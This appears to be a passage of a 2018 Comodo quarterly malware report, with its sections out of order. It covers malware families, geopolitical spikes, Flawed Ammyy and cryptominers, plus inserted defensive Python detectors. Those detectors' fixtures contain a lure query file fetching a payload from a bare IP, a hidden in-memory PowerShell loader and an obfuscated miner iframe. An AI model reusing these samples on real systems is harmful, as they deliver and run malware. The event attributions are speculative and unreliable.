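                                   len(raw), raw_ptr if raw else 0, 0, 0, 0, 0, 0x60000020))
        blobs.append(raw)
        raw_ptr += len(raw)
        va += max(vsize, len(raw), 0x1000)
    return dos + b"PE\0\0" + coff + b"".join(headers) + b"".join(blobs)


# Constructed section contents: 4096 pseudo-random bytes stand in for packed
# data, a repeated x86 prologue stands in for ordinary code.
HIGH_ENTROPY = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(128))
LOW_ENTROPY = b"\x55\x8b\xec\x83\xec\x10" * 600 + b"\0" * 512
UPX_SAMPLE = build_pe([("UPX0", b"", 0x20000), ("UPX1", HIGH_ENTROPY + b"UPX!", 0x2000),
                       (".rsrc", b"\0" * 64, 0x1000)])
MUPX_SAMPLE = build_pe([(".text", b"", 0x20000), (".data", HIGH_ENTROPY, 0x2000),
                        (".rsrc", b"\0" * 64, 0x1000)])
PLAIN_SAMPLE = build_pe([(".text", LOW_ENTROPY, 0x1000), (".data", b"\0" * 256, 0x1000)])

if __name__ == "__main__":
    for label, img in (("stock UPX", UPX_SAMPLE), ("renamed", MUPX_SAMPLE), ("plain", PLAIN_SAMPLE)):
        print(label, packer_indicators(img)["verdict"])
```

The renamed sample defeats the name and magic checks but not the layout and entropy checks, which is the point: a packer verdict should rest on what the packer cannot cheaply change. High entropy alone is not proof of packing (resources, certificates and compressed data sections also score high), so the verdict is graded rather than binary.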


5.3.3 Email Flooders

Email Flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.


5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.


5.3.5 Jokes

"Joke" malware is just what it says: non-malicious applications that claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically labeled only a "Medium" threat because the hacker's intention is not to damage or destroy information, but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous, but still something to be aware of.


5.4 Low Threat Malware: Applications

In this section we cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.


5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018, the most common such application was Elex. Although Microsoft has labeled Elex only a "Potentially Unwanted Application" (PUA), this software is nasty: it attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.


5.4.2 Unwanted Applications

The unwanted application category is alarming in that, in the course of common computer and Internet activity, users often inadvertently install these applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider and/or perform other actions users might not have intended. Such applications include free toolbars, adware and "system optimizers".

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.


5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs that are in fact frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. Such programs are referred to as "hacktools" and may be distributed with additional malware that users install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.


6 Vertical Analysis

In this section let's examine unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detections not just in one but in multiple verticals, clearly making them a current strategic threat across the world.


First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015, Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", another name for the "Zeus" Trojan, which has been undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social-engineering scheme that falsely claims the target's computer already has a virus and needs to be cleaned.

In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies the primary malware threats and better focuses limited time and resources against them.


7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence-collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill those requirements via computer hacking (commonly called cyber espionage), which today takes place on a far greater scale than the public realizes.


7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The likely reason for this massive spike is that many intelligence services, both foreign and domestic, were busy trying to protect and/or collect sensitive information relating to current events within China. Why June 4? That is the anniversary of the 1989 Tiananmen Square protests.


7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that forms the basis of intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place at the same time as the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.


7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.


7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.


7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.


7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral events. In mid-April, Iraq was preparing for a national election, which included a conundrum over how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.


7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.


7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it has been clear that cyberattacks can be used to punish not only individuals and enterprises but entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".


7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would hold a summit in the Finnish capital, Helsinki. Geolocation of this virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.
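Every timeline in this section turns on calling one day's count a spike. A defensible way to do that, added here as an example rather than Comodo's own method, is to score each day against the median and median absolute deviation (MAD) of the series, which, unlike the mean and standard deviation, are not dragged upward by the very spikes under test, and then to separate single-day spikes from multi-day elevations, the distinction the sections above draw between a "sharp spike" and a "persistent" problem. The daily counts below are constructed, not Comodo telemetry.

```python
"""Robust spike detection for daily detection counts, the kind of timeline the
geopolitical sections read by eye. Added example, not code from the report;
the daily counts below are constructed, not Comodo telemetry."""
from datetime import date, timedelta
from statistics import median


def robust_spikes(series, threshold=5.0):
    """series: list of (day, count). Flag days whose count exceeds the median
    by more than `threshold` robust standard deviations. Median and MAD are
    used instead of mean and stdev so that the spikes being looked for do not
    inflate the baseline they are measured against."""
    counts = [c for _, c in series]
    med = median(counts)
    mad = median(abs(c - med) for c in counts)
    scale = 1.4826 * mad if mad else 1.0  # 1.4826 makes MAD comparable to stdev; guards a flat series
    return [(d, c, (c - med) / scale) for d, c in series if (c - med) / scale > threshold]


def group_runs(flagged):
    """Collapse consecutive flagged days into (first, last, peak_count) runs:
    a one-day run is a sharp spike, a longer one a persistent elevation."""
    runs = []
    for d, c, _ in sorted(flagged):
        if runs and d == runs[-1][1] + timedelta(days=1):
            first, _, peak = runs[-1]
            runs[-1] = (first, d, max(peak, c))
        else:
            runs.append((d, d, c))
    return runs


def build_sample(start=date(2018, 6, 1), days=30):
    """Constructed June 2018 series: ~1000 detections a day with a small
    deterministic wobble, one single-day spike and one three-day elevation."""
    series = [(start + timedelta(days=i), 1000 + (i * 7) % 11 - 5) for i in range(days)]
    series[13] = (series[13][0], 9000)           # June 14
    for i in (19, 20, 21):                       # June 20 to 22
        series[i] = (series[i][0], 4000)
    return series


if __name__ == "__main__":
    flagged = robust_spikes(build_sample())
    for first, last, peak in group_runs(flagged):
        kind = "sharp spike" if first == last else "persistent elevation"
        print(f"{first} to {last}: {kind}, peak {peak}")
```

A threshold of five robust standard deviations is conservative. On real telemetry one would also remove weekday and weekend seasonality and normalize by the number of reporting sensors, because a jump in installed base looks exactly like a jump in malware, and that caveat applies to every attribution in this section.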


8 Conclusions

In Q2, Comodo Cybersecurity observed several new and significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will soon be amplified. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in its delivery methods, more sophisticated in persistence, and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and further mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. After a successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of trojans detected in Q2 were information stealers, we can see another dangerous tendency: cybercriminals' accelerating focus on hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, changing the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategies, policies and postures.


Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown", potentially dangerous files 24/7/365 in over 190 countries around the world. With five offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.

About Comodo Cybersecurity

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures, from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.



Flawed Ammyy is delivered to the victims through phishing emails with an IQY file attachment, as in the following screenshot.

The phishing email

IQY files are intended for making an Internet query from MS Excel, so an IQY contains a URL and other related parameters. Excel fetches the content at that URL and loads it directly into the spreadsheet.

The infected IQY included a malicious URL, so opening it runs a chain of malicious files that results in downloading and running Flawed Ammyy via Windows PowerShell.

Malware runs PowerShell


Thus, in this case, machines face extremely dangerous and potent malware created and delivered via legitimate software. This makes it much harder for antivirus software to detect the attack.
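As an added example (not the report's own code), the following Python triage script parses the IQY web-query format described above and flags attachments whose query URL points outside an allow-list, is fetched over plaintext HTTP, addresses a bare IP, or ends in a payload-like path; the allow-list, the sample files and the extension list are constructed for the demo.

```python
"""Triage Excel web-query (.iqy) attachments for the delivery pattern above:
a query URL that pulls attacker-controlled content into Excel.

Added example for this report, not Comodo's code. The IQY layout assumed here
(a WEB header line, a version line, the URL, then optional key=value lines) is
the documented Excel web-query text format; the allow-list, the file contents
and the extension list are constructed for the demo."""
import ipaddress
from dataclasses import dataclass, field
from typing import Dict, List, Set, Tuple
from urllib.parse import urlparse

# Extensions that signal a downloaded payload rather than tabular data (illustrative)
PAYLOAD_LIKE = (".dat", ".txt", ".ps1", ".exe", ".hta", ".vbs", ".bat")


@dataclass
class IqyFinding:
    url: str
    host: str
    reasons: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def parse_iqy(text: str) -> Tuple[str, Dict[str, str]]:
    """Return (url, params) for a WEB query file; raise ValueError otherwise."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) < 3 or lines[0].upper() != "WEB":
        raise ValueError("not an Excel WEB query file")
    url = lines[2]                       # line 2 (after WEB and the version) is the query URL
    params: Dict[str, str] = {}
    for ln in lines[3:]:                 # e.g. Selection=AllTables
        key, sep, value = ln.partition("=")
        if sep:
            params[key.strip()] = value.strip()
    return url, params


def _is_ip_literal(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def assess_iqy(text: str, trusted_hosts: Set[str]) -> IqyFinding:
    """Score one IQY body; every reason is a review trigger, not a verdict."""
    url, _params = parse_iqy(text)
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    finding = IqyFinding(url=url, host=host)
    if parsed.scheme not in ("http", "https"):
        finding.reasons.append(f"unexpected scheme {parsed.scheme!r}")
    elif parsed.scheme == "http":
        finding.reasons.append("query fetched over plaintext http")
    if host not in trusted_hosts:
        finding.reasons.append(f"host {host!r} is not on the allow-list")
    if _is_ip_literal(host):
        finding.reasons.append("URL addresses a bare IP instead of a hostname")
    if parsed.path.lower().endswith(PAYLOAD_LIKE):
        finding.reasons.append("path ends in a payload-like extension")
    return finding


# Constructed sample attachments: a legitimate intranet query and a lure
TRUSTED = {"intranet.example.com"}
BENIGN_IQY = "WEB\n1\nhttps://intranet.example.com/sales/q2.csv\n\nSelection=AllTables\nFormatting=None\n"
LURE_IQY = "WEB\n1\nhttp://203.0.113.10/2.dat\n"

if __name__ == "__main__":
    for name, body in (("benign", BENIGN_IQY), ("lure", LURE_IQY)):
        f = assess_iqy(body, TRUSTED)
        print(name, "SUSPICIOUS" if f.suspicious else "ok", f.reasons)
```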

2.4 The growth of Flawed Ammyy attacks for Q2

The growth of Flawed Ammyy attacks for Q2

2.5 Ammyy Admin dissemination around the world for Q2

As illustrated, trojans became an 800-pound gorilla in the malware market in Q2. This trend will inevitably entail a change of attack vectors toward covert theft and manipulating users. This trend is a real gift for cybercriminals and a terrible nightmare for users.

Trojans let attackers gain time. As the malware acts covertly, cybercriminals have more than enough time to use stolen data to their advantage. In many cases attacks are discovered only when it is too late: after money is withdrawn from a bank account, confidential data is published, etc. The merging of trojans as payloads with phishing emails as the means of delivery, observed during Q2, will result in a huge surge in such attacks and victims. And using legitimate tools like PowerShell for running malware will amplify the number of victims even more, because such attacks are much harder to detect with antivirus software.

To fight these attacks, cybersecurity departments need to rearrange their approach to security measures in line with the new trends above. Combining the best malware detection tools with data-protection methods built on defense-in-depth principles provides the most promising solution.

[Chart: The growth of Flawed Ammyy attacks for Q2. Data labels: 43188, 46382, 48881; y-axis from 40000 to 50000; x-axis: Apr, May, Jun.]


3 Cryptominer Evolution

Going Fileless, Killing Competitors, Crashing Systems

Cryptominers do not lead the Q2 malware pack, but that does not mean their impact is greatly diminished. On the contrary, current cryptominer behavior recalls that of an army preparing for battle: training and re-provisioning to fight more efficiently. Cryptominers are quickly developing and gaining new, dangerous abilities.

Earlier cryptomining examples were only able to use infected machine resources to mine cryptocurrency on behalf of the attackers. For that reason many users did not regard them as particularly dangerous: at least cryptominers would not steal information or destroy data like other malware, merely sucking up CPU resources. Moreover, they typically did not employ strong obfuscation and could be easily discovered and deleted.

But Q2 events clearly showed that the situation has radically changed.

New samples of cryptominers detected by Comodo malware analysts exhibit far more harmful abilities than those required for merely mining cryptocurrency. These samples clearly show that cryptominers are transforming into a sophisticated and multifunctional weapon for cybercriminals. They are learning to hide and to fight against antimalware tools. They can camouflage themselves, kill competing cryptominers and even crash user systems if met with an attempt to delete the malware.

3.1 BadShell attacks enterprises

Fileless malware is next-generation malware, especially compared with traditional infection via .exe files. File-based malware resides on the hard drive, making it easier to detect. But fileless malware is different. As its name suggests, this type of malware consists of malicious code injected into legitimate OS processes. It need not be installed on the victim machine but functions only in memory, making it much harder for antivirus software to detect.

Usually such malware is spread via malicious ad banners. Clicking on a banner redirects a user to an infected website, where the malware covertly installs itself on the victim's computer. As many antivirus tools cannot detect it, users remain unaware of being infected. Not surprisingly, its use by cybercriminals is on the increase.

Last quarter, Comodo Threat Research Labs analysts faced a scenario of just such an attack. A company with several thousand endpoints was compromised by fileless malware. When their legacy security software failed to protect them, the company looked to Comodo Threat Research Labs for assistance.


Comodo analysts revealed that the malware was a cryptominer that utilized legitimate Windows components: PowerShell to execute commands, Task Scheduler to ensure persistence, and the Registry to hold the malicious binary code. In the screenshots below you can see exactly how the malware, dubbed BadShell, works.

If we decode the PowerShell arguments, we see the malicious code in the registry. The code is injected into an existing running process by the PowerShell script.

BadShell at work
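An added example (not Comodo's code) of the decoding step described above, run over constructed process-creation log lines: it unpacks PowerShell's UTF-16LE base64 -EncodedCommand argument and flags the registry-read plus in-memory-load pairing that characterises BadShell. The indicator patterns, the placeholder registry key and the log lines are this example's own.

```python
"""Decode PowerShell -EncodedCommand arguments out of process-creation log
lines and flag the BadShell combination: a script that reads a blob from the
Registry and hands it to an in-memory loader.

Added example for this report, not Comodo's code. The log lines are
constructed; the indicator regexes are illustrative, not a complete rule."""
import base64
import binascii
import re
from typing import Dict, List, Optional

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the common ones
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

SCRIPT_INDICATORS = {
    "registry_read": re.compile(r"Get-ItemProperty|HKCU:|HKLM:|Registry::", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "inmemory_load": re.compile(
        r"\[System\.Reflection\.Assembly\]::Load|Invoke-Expression|\bIEX\b", re.I),
}
# Checked against the outer command line rather than the decoded script
CMDLINE_INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "noprofile": re.compile(r"-nop(?:rofile)?\b", re.I),
}


def encode_command(script: str) -> str:
    """PowerShell's encoding: UTF-16LE text, then base64 (used here to build samples)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script, or None if there is no valid encoded argument."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None


def classify(cmdline: str) -> Dict[str, object]:
    script = decode_encoded_command(cmdline)
    hits: List[str] = [n for n, p in CMDLINE_INDICATORS.items() if p.search(cmdline)]
    if script is not None:
        hits += [n for n, p in SCRIPT_INDICATORS.items() if p.search(script)]
    # BadShell's signature is the pairing: payload sourced from the Registry,
    # executed without ever touching disk.
    badshell_like = {"registry_read", "inmemory_load"} <= set(hits)
    return {"decoded": script, "indicators": hits, "badshell_like": badshell_like}


# Constructed samples. The first mimics the pattern described above with a
# placeholder key and value name; the second is an ordinary admin one-liner.
LOADER_SCRIPT = ("$blob = (Get-ItemProperty -Path 'HKCU:\\Software\\DemoKey').DemoValue; "
                 "[System.Reflection.Assembly]::Load([Convert]::FromBase64String($blob))")
ADMIN_SCRIPT = "Get-Process | Where-Object CPU -gt 100 | Select-Object Name, CPU"

SAMPLE_LOGS = [
    "powershell.exe -nop -w hidden -ec " + encode_command(LOADER_SCRIPT),
    "powershell.exe -EncodedCommand " + encode_command(ADMIN_SCRIPT),
    "powershell.exe -Command Get-Date",
]

if __name__ == "__main__":
    for line in SAMPLE_LOGS:
        verdict = classify(line)
        print(verdict["badshell_like"], verdict["indicators"])
```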


The malicious code in the registry


This emergency clearly demonstrates how dangerous cryptominer activity can be. Just imagine it: the entire compute capacity of the enterprise's computers was engaged in mining cryptocurrency, depriving employees of the ability to perform their jobs. Comodo analysts took over the situation and cleaned the infection from all involved computers, but of course the company's financial losses were irreversible.

Evading antivirus software and persisting in the system are the most important attributes of a cryptominer, because the longer it runs within the infected system, the more it profits the attackers. That is why cybercriminals give special attention to a cryptominer's ability to elude antivirus software.

Below is another cunning technique that turns an infected machine into a slave of the attacker.

3.2 WinstarNssmMiner, a system killer

Like other cryptominers, WinstarNssmMiner is designed to steal computer resources to mine cryptocurrency coins for cybercriminals. But it has a special feature: it can root itself into a system so deeply that it becomes unremovable. Attempting to kill it will kill the target system entirely.

The secret of WinstarNssmMiner's persistence lies in its method of infecting a victim's computer. It consists of two processes injected into two system svchost.exe processes. The first performs the main task, mining cryptocurrency. The other runs in the background, looking for antivirus products and disabling them.

The malicious code disguised as svchost.exe

Especially impressive is that both infected svchost.exe processes possess the system attribute "CriticalProcess", meaning that terminating either of them will crash the system, leaving the user with a blue screen.

WinstarNssmMiner spreading around the world


Cryptominers can kill not only victims' systems but also their cryptomining competitors.

3.3 CoinMiner kills rivals

CoinMiner stands out against other cryptominers with a kill-list feature that checks the infected machine for the presence of other cryptomalware. If an "alien" cryptominer is detected, the feature terminates its processes.

CoinMiner kills its rivals as follows.

The code below downloads CoinMiner for the Windows architecture in use (x86 or x64) and then checks whether a miner is already running by testing for the presence of an "AMDDriver64" process.


The code downloads CoinMiner and checks if a miner is already running

The malware maintains two lists, named $malwares and $malwares2, with the names of the processes it is instructed to kill. The lists include other types of cryptominers.

In this way CoinMiner occupies the victim's computer exclusively and uses its resources for mining cryptocurrency.


Some cryptominers earned the spotlight of the mass media and cybersecurity researchers, which made it easier for users to detect them. In Q2 these cryptominers learned to hide; CoinHive is the brightest example of them.

3.4 CoinHive changes its skin

CoinHive is a popular JavaScript cryptominer. If you put its string of code into your website page, every visitor to the site will mine coins for you.

As you can see, the CoinHive script is easily detected.

The CoinHive script

After many publications on this subject in the mass media and cybersecurity reports, users started checking website code for cryptominers. But in the second quarter perpetrators found a way to overcome this obstacle. Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners.


As a result, the malicious code on a webpage looks like this.

The obfuscated malicious code on a webpage

If we decode the string, we encounter an iframe.

The iframe loads the URL shortener

Notice that the width and height of the iframe are set to 1 to make the iframe as invisible as possible.

Now let's look at the URL https://cnhv.co.

And there we find the familiar link to CoinHive.

The link to CoinHive


What is the impact of this trick? In a simple scenario, a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the webpage code but doesn't find any signs of a cryptominer. So she concludes that something went wrong with her PC, while CoinHive co-opts her computer to mine cryptocoins.
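An added example (not the report's or CoinHive's code) of the detection side of the trick above: it scans a page for iframes whose source is a known miner short-link host, including frames that only exist after the page decodes an escaped or base64 string at runtime, and reports whether the frame is sized or styled to be invisible. The sample page, the short-link path and the host watch-list are constructed.

```python
"""Find hidden iframes that route through a miner short link, including
frames the page only builds at runtime from an escaped or base64 string,
which is the camouflage described above.

Added example for this report, not Comodo's or CoinHive's code. The sample
page, the short-link path and the host watch-list are constructed."""
import base64
import binascii
import re
from dataclasses import dataclass
from html.parser import HTMLParser
from typing import Dict, Iterator, List, Optional
from urllib.parse import unquote, urlparse

MINER_HOSTS = {"cnhv.co", "coinhive.com", "coin-hive.com"}   # illustrative watch-list

# Decoder calls whose string argument is often hidden markup
UNESCAPE_CALL = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.S)
ATOB_CALL = re.compile(r"atob\(\s*(['\"])([A-Za-z0-9+/=]+)\1\s*\)")


@dataclass
class IframeFinding:
    src: str
    host: str
    hidden: bool
    from_encoded: bool   # True when the tag only appears after decoding


class _IframeCollector(HTMLParser):
    def __init__(self) -> None:
        super().__init__()
        self.iframes: List[Dict[str, Optional[str]]] = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append(dict(attrs))


def _px(value: Optional[str]) -> Optional[int]:
    """Leading integer of a width/height attribute ('1', '1px'), else None."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None


def _is_hidden(attrs: Dict[str, Optional[str]]) -> bool:
    w, h = _px(attrs.get("width")), _px(attrs.get("height"))
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return ((w is not None and w <= 1) or (h is not None and h <= 1)
            or "display:none" in style or "visibility:hidden" in style)


def decoded_fragments(html: str) -> Iterator[str]:
    """Yield markup that the page would only materialise at runtime."""
    for _quote, body in UNESCAPE_CALL.findall(html):
        yield unquote(body)
    for _quote, body in ATOB_CALL.findall(html):
        try:
            yield base64.b64decode(body, validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            continue


def find_miner_iframes(html: str) -> List[IframeFinding]:
    findings: List[IframeFinding] = []
    sources = [(html, False)] + [(frag, True) for frag in decoded_fragments(html)]
    for markup, encoded in sources:
        collector = _IframeCollector()
        collector.feed(markup)
        for attrs in collector.iframes:
            src = attrs.get("src") or ""
            host = (urlparse(src).hostname or "").lower()
            if host in MINER_HOSTS:
                findings.append(IframeFinding(src, host, _is_hidden(attrs), encoded))
    return findings


# Constructed page: a visible, legitimate embed plus a 1x1 frame that is only
# written after the escaped string is decoded, pointing at a placeholder path.
SAMPLE_PAGE = """<html><body><h1>Welcome</h1>
<script>document.write(unescape('%3Ciframe%20src%3D%22https%3A%2F%2Fcnhv.co%2FPLACEHOLDER%22%20width%3D%221%22%20height%3D%221%22%3E%3C%2Fiframe%3E'));</script>
<iframe src="https://www.example.com/embed" width="600" height="400"></iframe>
</body></html>"""

if __name__ == "__main__":
    for finding in find_miner_iframes(SAMPLE_PAGE):
        print(finding)
```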

The next malware in our list prefers not to mine cryptocurrency but to steal it on the fly.

3.5 Cryptocurrency clipboard hijacker intercepts transfers

It would be more accurate to call this program a cryptothief rather than a cryptominer, because it does not devour an infected machine's resources but instead actually steals cryptocurrency, redirecting it to the perpetrator.

